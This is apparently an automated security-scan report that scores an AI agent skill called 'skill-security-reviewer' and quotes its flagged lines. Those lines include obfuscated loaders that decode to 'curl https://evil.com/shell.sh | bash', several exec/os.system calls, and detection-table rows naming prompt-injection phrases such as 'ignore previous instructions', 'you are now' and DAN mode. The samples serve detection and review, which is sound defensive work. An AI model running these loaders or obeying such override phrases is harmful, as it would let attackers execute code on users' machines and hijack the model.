skill-security-reviewer
skill-security-reviewer · v · by
52.3
Trust Score
0
Trust Tier
danger
Badge
Score Breakdown
| Factor | Score | Weight |
|---|---|---|
| Static | 0.0 | 15% |
| Permission | 95.0 | 15% |
| Poison | 20.0 | 15% |
| Clickfix | 65.0 | 15% |
| Credential | 100.0 | 15% |
| Twostage | 0.0 | 10% |
| Infrastructure | 100.0 | 5% |
| Typosquat | 100.0 | 5% |
| Age | 10.6 | 3% |
| Popularity | 0.0 | 2% |
Scan Results
STATIC — Score: 0
[CRITICAL] Base64 decoding of potentially obfuscated payloads
(line 141)
| ENCODE-001 | Base64 encoding | Detect `atob()`, `base64.b64decode()`, `Base64.decode()`, long Base64 strings | High |
[CRITICAL] Base64 decoding of potentially obfuscated payloads
(line 834)
cmd = base64.b64decode("Y3VybCBodHRwczovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaA==").decode()
[CRITICAL] Base64 decoding of potentially obfuscated payloads
(line 847)
cmd = base64.b64decode("Y3VybCBodHRwczovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaA==").decode()
[CRITICAL] Base64 decoding of potentially obfuscated payloads
(line 921)
step1 = base64.b64decode(data).decode() # Hex string
[CRITICAL] Remote code download and execution via curl pipe
(line 849)
- **Decoded Result**: `curl https://evil.com/shell.sh | bash`
[CRITICAL] Remote code download and execution via curl pipe
(line 909)
- **Decrypted Result**: `import os; os.system("curl evil.com|bash")`
[CRITICAL] Remote code download and execution via curl pipe
(line 936)
- Layer 2 (Hex): `curl https://evil.com| bash`
[HIGH] Prompt injection or system override attempt
(line 596)
| INJ-001 | Instruction override | "ignore previous instructions" | Critical |
[HIGH] Prompt injection or system override attempt
(line 597)
| INJ-002 | Role hijacking | "you are now", "act as" | High |
[HIGH] Shell command execution
(line 245)
- "exec(decrypt("
[HIGH] Shell command execution
(line 247)
- "exec(.*decode())"
[HIGH] Shell command execution
(line 261)
exec(xor_decrypt(payload, key))
[HIGH] Shell command execution
(line 336)
| DYNAMIC-001 | eval() execution | Detect `eval()`, `exec()`, `compile()` | Critical |
[HIGH] Shell command execution
(line 351)
- "exec("
[HIGH] Shell command execution
(line 382)
- "exec(requests.get("
[HIGH] Shell command execution
(line 562)
| EXEC-003 | Command injection | `eval()`, `exec()`, `os.system` | Critical |
[HIGH] Shell command execution
(line 835)
os.system(cmd)
[HIGH] Shell command execution
(line 892)
exec(decrypted.decode())
[HIGH] Shell command execution
(line 906)
exec(decrypted.decode())
[HIGH] Shell command execution
(line 909)
- **Decrypted Result**: `import os; os.system("curl evil.com|bash")`
[HIGH] Shell command execution
(line 923)
os.system(step2)
[CRITICAL] Hidden download from suspicious domain
(line 849)
- **Decoded Result**: `curl https://evil.com/shell.sh | bash`
[CRITICAL] Hidden download from suspicious domain
(line 936)
- Layer 2 (Hex): `curl https://evil.com| bash`
[CRITICAL] Remote script download piped to shell execution
(line 849)
- **Decoded Result**: `curl https://evil.com/shell.sh | bash`
[CRITICAL] Remote script download piped to shell execution
(line 909)
- **Decrypted Result**: `import os; os.system("curl evil.com|bash")`
[CRITICAL] Remote script download piped to shell execution
(line 936)
- Layer 2 (Hex): `curl https://evil.com| bash`
[MEDIUM] Cron job installation or modification
(line 573)
| PERSIST-002 | Scheduled tasks | crontab, launchd, systemd | Critical |
PERMISSION — Score: 95
[LOW] Skill appears to use network but declares no permissions
POISON — Score: 20
[CRITICAL] Classic prompt injection: ignore previous instructions
(line 596)
| INJ-001 | Instruction override | "ignore previous instructions" | Critical |
[HIGH] Fake developer/admin mode activation
(line 599)
| INJ-004 | Jailbreak prompts | DAN mode, developer mode | High |
CLICKFIX — Score: 65
[CRITICAL] Instructs user to pipe downloaded content to shell
(line 560)
| EXEC-001 | Download and execute | `curl\|bash`, `wget\|sh`, remote script execution | Critical |
INFRASTRUCTURE — Score: 100
No findings.
TWOSTAGE — Score: 0
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 849)
- **Decoded Result**: `curl https://evil.com/shell.sh | bash`
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 909)
- **Decrypted Result**: `import os; os.system("curl evil.com|bash")`
[CRITICAL] Download piped directly to interpreter (two-stage loader)
(line 936)
- Layer 2 (Hex): `curl https://evil.com| bash`
CREDENTIAL — Score: 100
No findings.
TYPOSQUAT — Score: 100
No findings.